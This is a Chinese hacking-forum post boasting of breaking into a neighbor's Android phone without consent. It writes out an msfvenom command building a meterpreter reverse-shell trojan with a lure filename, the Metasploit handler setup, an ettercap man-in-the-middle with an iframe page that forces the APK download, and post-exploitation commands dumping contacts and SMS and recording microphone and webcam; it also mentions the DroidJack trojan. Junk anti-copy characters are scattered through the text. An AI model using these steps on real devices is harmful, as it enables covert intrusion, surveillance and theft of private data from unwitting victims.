找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 1970|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) b, M1 N4 B1 M/ N$ e 五、msf+ettercap入侵邻居安卓手机 `) L3 `. L" @

/ _5 Y8 m9 ~3 N% F H% q8 ~) I

! s* ^ q0 [3 u8 ?; R4 o 首先启动msf 5 J5 g7 y) a1 G1 T3 G

1 L7 P- M2 h: } U ^

4 v% P- l/ C I- x 先用kali生成一个安卓木马,如下命令: 8 \; G) ?3 I' {0 A6 v

' O8 r4 W! t) q( n

% S* d9 {* w! D+ J- S. Q5 f Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk , d, [3 \" F; f( @5 t4 Z) Q: M/ r

+ O4 t* l9 U A$ `

" D8 b& S2 @5 q2 h' o5 a- U 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 X" C. O, C0 b9 `4 w7 L

8 _3 k, A2 o8 c6 e. r" _ U6 s

f% X( R8 \% J: l& i t 然后进入msf 6 ?# A+ }- u% j2 k- I3 ?5 \

( m# T) Y" K$ [, K0 H) n3 V

/ x+ B7 l7 F- O7 a use exploit/multi/handler % h, `6 O2 L' _0 c d! v- R; [

5 m) E) J7 E( z/ _( p% x

$ [9 u% `# h* v- t- V) u6 \ set payload android/meterpreter/reverse_tcp * S$ ^$ N8 x% a& U! j

$ e# e) K! K5 j5 A9 @

' L W* x# `: C8 D8 ~7 N r set LHOST 192.168.0.109 //ipkailiip ( D4 W& M. X4 w7 n5 F+ `4 [

. x+ O* P/ T( {+ U7 `

4 ]! k1 \/ A6 |6 a" A5 ^& r set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : ?1 H- X8 Q' B3 N

- ~1 D% U9 D" T4 D3 P. _

, R/ |$ b* d1 Y7 D5 R8 W- \ Exploit 6 E/ w* |. V8 l+ H( a

6 P5 K h6 {2 g ~: t3 @0 v1 Y

7 \! p6 s% w) o) ^# w; H9 b. s   3 b+ l- p' z) H$ o6 d

$ _7 ]0 x7 w6 t1 K" B/ }, C

9 [9 x3 Y% Y. M 下面我们开启ettercap -G 7 E; A9 T) m* q$ n

1 N; ^4 G: Y# T7 z) Q2 g

" h9 P6 o9 f+ L2 j9 Z 我物理IP 1 @' M" }* G1 J' e3 N* P

/ ~, z i/ S8 ]& A- u! q; ?

2 q- e3 r9 t( `9 I0 r: W4 t) k   - V6 P2 c: _% l

" ?2 T/ H1 O! M; v

# K+ j6 ?' |4 r3 M4 {& \% f 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ( r+ e: t9 `4 c+ _6 P$ K

. G- C8 I2 V8 L2 L

* m! {6 [3 Z r. E7 \( H 下面我们来设置一下 K `' w7 _2 _! }; @3 E

9 `/ I# G- n' q

. m/ V9 X4 t: n1 Q7 t   0 Q# G! ^; M7 J0 _8 s( K0 G" C

( j9 E& e0 D1 J1 j0 k( B& U

- ]: u. d$ N+ G9 [ O, i( t 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 6 h3 Q3 t. A- p. j% ?; d' y

7 ]0 F: [+ ?; v1 E

8 q' ]4 v& K2 K% p   9 x1 w' R9 M% o. M V

2 p% o q) n& e. q: o

; {6 z& L+ A5 T; s% h   " \9 ~/ P1 }* ]* {

; l, x+ q, A4 `6 l7 y

& o4 ]+ J2 {3 Z- n5 u6 A* m% g   6 s. _! j4 W9 R. {8 P t8 N

- u$ N: F$ w' T# f

- P5 T6 W j6 q! R/ U   7 |" d8 m5 _( v( l) e8 A( V

* U+ a7 d) D( Z8 C$ S3 Y. w

7 x! q6 c- T2 O" ]) n   % E- b/ Q3 ~0 D

6 E( o6 x4 R- E* W0 ^: u

. ^8 v, L" W7 r `   $ { [1 _/ F9 O8 {8 Z7 R; H7 @

/ S6 m3 [3 G7 t' K& M

0 t6 g2 Q1 A4 u7 Z   / F" K; v& i! V9 f4 H3 g

5 k3 C; F& e" n5 `* ^* J ]

. a8 e' H& J4 c+ U+ x$ p7 j   4 K B& Z% M2 @

+ u6 o. Z1 N1 P

- w& e. q' ~/ Q) `+ E7 U8 Z, C   6 Z3 u- T8 p, W9 v$ M E7 p

0 r4 K7 k; R$ L

1 D3 j9 a5 S/ f- S5 t   ! b5 Q/ L. x9 h7 n& y5 `2 ^" m

, t7 B# V1 o& V# A* N: T) |) x! Z0 J

: R+ {) L" x8 i. R! N6 ]5 G1 m% n& V   ( y0 s& B- X& @, p8 [( ?

9 k7 s& k2 b+ U/ T; W4 E

& y: P& P& b' D8 p   5 T; q; l3 _$ z% S

1 `$ }; u' Y+ `. E7 P! Q% r8 l( U

% V7 g2 ^8 \# V% F t& X8 H5 _   $ b( B3 q( r3 ]# z' \0 Y3 }

( o6 M& N( _- b! x. ?* q

$ v. w3 q% L1 P: b8 k& ^5 c 下面我们开始攻击 : S; C( r X; e z) ]

D( T. G2 q. u

3 w W$ p' P- n2 C% B* k/ Y   # H8 j5 W( a& M" T) a! q1 C

' G( D1 n& r, h! k9 y, p

+ h3 ~7 n" ?2 T8 n; {2 X! v   0 `% n Q- U5 T2 h: }, F

! `. E' p p4 ~9 N1 m( J# n

# G2 @: I5 N3 Z8 L   ' p! g, \2 X `/ _* p

5 T4 u9 m1 ?# w/ }- e+ k

! `+ ]) s4 { X7 {& M   4 i3 K' D3 U; |8 i) h

; ? P K6 q' G) G1 T' j

9 N9 y% v! g' x% [2 }   % M5 J6 s9 R3 u, h4 q

6 W1 y% D U h7 U2 ~+ e

* k* r6 u& i- M/ o2 _9 o 大概过了5分钟多,发现反弹成功了 ) G& o' U3 _: S, h- ?: k$ n

8 P; ]( _9 P8 ~* N( r

& C% f8 m2 Q6 n; v* f   2 W5 q! @% w! ]5 x9 C

- w5 M/ u- R3 ~) W4 N, m* U9 s0 o; W

; r& V" \7 n4 G   # O8 H2 A. v9 U, h* g

) C- b; b: O* O6 \6 Q

0 z7 Q! ]. `% k* _   ; V1 R" I$ u% ^3 ~

+ A5 c1 t7 B$ u0 _+ ]& u) |

8 e- C6 x0 y# [$ m- G   ( q3 E- l& H' O* n1 d: U7 E9 n

+ q2 e" x. B" w4 B

% i2 _6 R: R6 T   0 z& w# }2 w) O4 W" D L

O2 ^4 n2 e L/ _+ G1 J

# b& \7 k$ E$ X6 Z* D$ L) e   , l0 j+ M% J! m: g1 i6 J

4 a$ W; g* \) w) h5 V- U& e

7 l# E* U9 K) J: L+ T' @6 O   - g2 \8 V' ?! y' ?/ i

* i) U% o: M3 n6 s

) O, s) d; ^& n 执行命令 / ~4 \$ t0 G9 e4 F

1 T" }2 g2 D1 ?

' \0 {- w- ~% t' G$ @1 u* _   & Z; Q; G* ?4 |$ i8 m0 M1 Y* m

4 k% |: t/ T' U4 K& L Y7 u, k9 N Y

/ D+ M! E) i" }, B X# B* o5 r* X dump_contacts    --》这个是导出电话 3 o. I$ L8 K. w; o" l& J+ i z5 Y. I

. X' _# W- L" v

l7 [* w/ M0 T9 s dump_sms --》这个是导出信息 7 X8 k$ g# W; r- P T9 e

4 ]& I! i6 ~8 D* s' ?

8 y" L1 a/ z, d record_mic     Record audio from the default microphone for X seconds ( h* \3 g# e( p, [. K ]! W3 H

4 i2 }) f% o+ w& f9 m9 W+ Y

3 c2 m, r& Y" h/ A. c     webcam_chat    Start a video chat ) r4 Z4 m- r$ t& W# F. z

- @$ }1 Y1 o! W( L! o* }

. A+ h" b: n4 k% b# G& _     webcam_list    List webcams $ p9 i. J4 ^* e: q$ C9 w/ t

; R9 c, @) v& s1 n

( `. E' A3 @$ W8 a$ M) n     webcam_snap    Take a snapshot from the specified webcam ' E5 H+ ^/ O) C3 C' |

) r a) x( C) P, v8 V7 h

9 y3 A7 E0 _1 J! }' Q4 m webcam_stream  lay a video stream from the specified webcam 4 a5 r( S2 c. C6 P& J

) t+ E% ^8 `" T

( m1 s' @! c+ b" H, I   3 w, `& o1 u& Z' Z

) u! J# F; b9 ^; o4 s

6 E6 `8 o6 F! r! }( q, @   " P% L% D! Z6 b8 [/ U) X4 t

8 X5 C* y1 s! g- R2 C5 M) m

7 Q0 D: X2 v! F o/ U. } 我们打开看一下电话薄, . _( L0 I2 P. @6 B# X

' F3 o. e* F% O: t

; z& A V% s' ?9 [9 H   # e$ o+ i! }( w; E& N0 K6 ` @

7 b& ?: [. ~8 n1 z# }! M, \

9 @ z, @% d) v- M4 y; [1 Q. E   5 i/ K; A, D6 v! x K

8 ]4 M9 h% g/ P* B$ _0 @

' } j( w9 _3 r S   " S/ g8 Q4 R% d. H. Q

2 V# n% r! X4 {3 S4 Y9 J

F3 P! s, [4 N1 \3 @3 s4 J5 P   4 H: T: X# ?5 x6 k. B

3 }) m8 [9 D0 ^# v+ i7 M! e0 v% F' C

! e+ e- @! U+ j' C/ `, U9 M( A4 Q8 u0 ?   8 _1 m) L" i1 L2 d1 B K4 l

0 {+ \$ R6 ~6 T0 a8 `- r& M M; N

' g: k9 n; F8 B   1 a8 e. z6 ]4 u6 j

5 j3 Y! P) H1 }& L, D f4 r; A

% \4 P" n" W- n 我们同时欺骗成DroidJack木马,使用方法如图: 6 J2 [% \; u7 @; w/ V

/ u, j1 s1 ~$ s6 w' ^/ S

4 d k5 L1 S9 D, Q( a   ; F1 ?" `, t. N7 x8 h; m4 ~' @( }* Y

& o4 i. C9 Z& X! }: ~; y

8 G# i8 Z& u# K" `0 g2 b   : t! G% Y" @+ W V" y3 v+ _ r

4 ^( ~" l5 X- }# O5 ^: t

9 Z8 \% A, F+ m# W: B8 z: B   7 l% N1 ^' R- I' _

6 ?7 t* S ^/ ]! e

+ k- L! t0 H c5 |) n 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 2 D* d+ n4 ?2 i0 T0 u" ~

- q! n! c! v: @9 u3 P" M5 [7 [

. R, x6 t% u. Q7 C0 b   & Q3 d& B$ t+ O

y0 \: u: V* F9 q$ C0 j" i

: A" B% `. Q6 F6 A# j   % X1 b1 L: \# [3 i

) U( D) C( D, i$ x+ v$ w# g

0 T: `' ]3 c0 W8 E; m   ( C n% f- Q9 S5 M& T1 h

9 h* ?& R6 J) ^; w r$ v @& ~

9 t6 \/ p m/ C% S% r3 |, |1 p ' W8 P% y: D: F% r

; l/ n2 B# z4 |. N) b( ~5 i4 H' r

; A p6 ]8 [- A5 a! ~
. I5 u& x# s. ?: h

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表